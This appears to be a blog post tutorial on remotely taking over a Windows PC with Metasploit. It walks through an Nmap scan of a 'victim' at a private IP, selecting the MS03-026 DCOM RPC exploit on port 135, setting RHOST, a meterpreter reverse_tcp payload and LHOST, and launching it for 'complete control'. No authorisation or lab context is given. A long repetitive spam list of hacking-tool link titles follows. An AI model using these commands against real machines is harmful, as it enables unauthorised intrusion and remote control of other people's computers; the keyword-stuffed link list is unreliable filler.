Friday, January 19, 2024

HOW TO HACK A PC REMOTELY WITH METASPLOIT?

Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.

SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?

REQUIREMENTS

Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim

STEPS TO FOLLOW

Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.

Related articles


  1. Pentest Tools Subdomain
  2. Nsa Hacker Tools
  3. Pentest Tools Url Fuzzer
  4. Hack Tools 2019
  5. Pentest Tools Tcp Port Scanner
  6. Top Pentest Tools
  7. Hacks And Tools
  8. Hacking Tools For Beginners
  9. Hack Tools For Games
  10. Kik Hack Tools
  11. Hack Tools Github
  12. Beginner Hacker Tools
  13. Hacker Tools 2020
  14. Hacker Security Tools
  15. Pentest Tools Linux
  16. Hacker Tools List
  17. Hacking Tools Windows
  18. Physical Pentest Tools
  19. Hack Tools Github
  20. Hacker Tools List
  21. Physical Pentest Tools
  22. Pentest Tools Windows
  23. Hacking Tools And Software
  24. Pentest Tools Tcp Port Scanner
  25. Pentest Tools Tcp Port Scanner
  26. Hacking Tools For Games
  27. Pentest Tools Open Source
  28. Hacking Tools For Pc
  29. Beginner Hacker Tools
  30. Hack Tools Download
  31. Pentest Automation Tools
  32. Hacker Hardware Tools
  33. How To Make Hacking Tools
  34. Growth Hacker Tools
  35. Pentest Tools For Ubuntu
  36. New Hacker Tools
  37. Computer Hacker
  38. Hacking Tools Windows
  39. Hacker Tools Mac
  40. Hack Tools Github
  41. Usb Pentest Tools
  42. New Hacker Tools
  43. Pentest Tools Framework
  44. Hacker Security Tools
  45. Hak5 Tools
  46. Hacker Tools For Windows
  47. Nsa Hack Tools Download
  48. Top Pentest Tools
  49. Hacker Tool Kit
  50. Hacking Tools Free Download
  51. Tools Used For Hacking
  52. Hacker Tools 2020
  53. Android Hack Tools Github
  54. Pentest Tools For Android
  55. Hack Rom Tools
  56. Tools Used For Hacking
  57. Pentest Tools Android
  58. Hacking Tools Online
  59. Blackhat Hacker Tools
  60. Hack Tools Github
  61. Hacker Tools Free Download
  62. Hacker Hardware Tools
  63. Hacker Tools Mac
  64. Hacking Tools Pc
  65. Hack Tool Apk
  66. Pentest Tools Bluekeep
  67. Hacker Search Tools
  68. Pentest Tools Open Source
  69. Game Hacking
  70. Hacker Tools List
  71. Blackhat Hacker Tools
  72. Hacker
  73. Pentest Tools Tcp Port Scanner
  74. Install Pentest Tools Ubuntu
  75. Hack Tools For Games
  76. Pentest Tools Review
  77. New Hack Tools
  78. Hack Tool Apk
  79. Usb Pentest Tools
  80. Tools For Hacker
  81. Hacker Tools 2020
  82. Hacker Tools Linux
  83. Pentest Tools For Android
  84. Pentest Box Tools Download
  85. Hacking Tools For Kali Linux
  86. Hacking Tools 2020
  87. Hack Tools Download
  88. Hacker Tools Free
  89. Hacking Tools Download
  90. Hak5 Tools
  91. Pentest Tools Windows
  92. Hack Tools Mac
  93. Hacking Tools Usb
  94. How To Make Hacking Tools
  95. Hack Website Online Tool
  96. Hacker Tools Mac
  97. Pentest Tools Online
  98. Hacker Techniques Tools And Incident Handling
  99. Hacking Tools For Beginners
  100. Hack Tools For Pc
  101. Pentest Tools For Ubuntu
  102. Hacker Tools 2019
  103. Pentest Tools Find Subdomains

Digg Google Bookmarks reddit Mixx StumbleUpon Technorati Yahoo! Buzz DesignFloat Delicious BlinkList Furl

0 comments: on "HOW TO HACK A PC REMOTELY WITH METASPLOIT?"

Post a Comment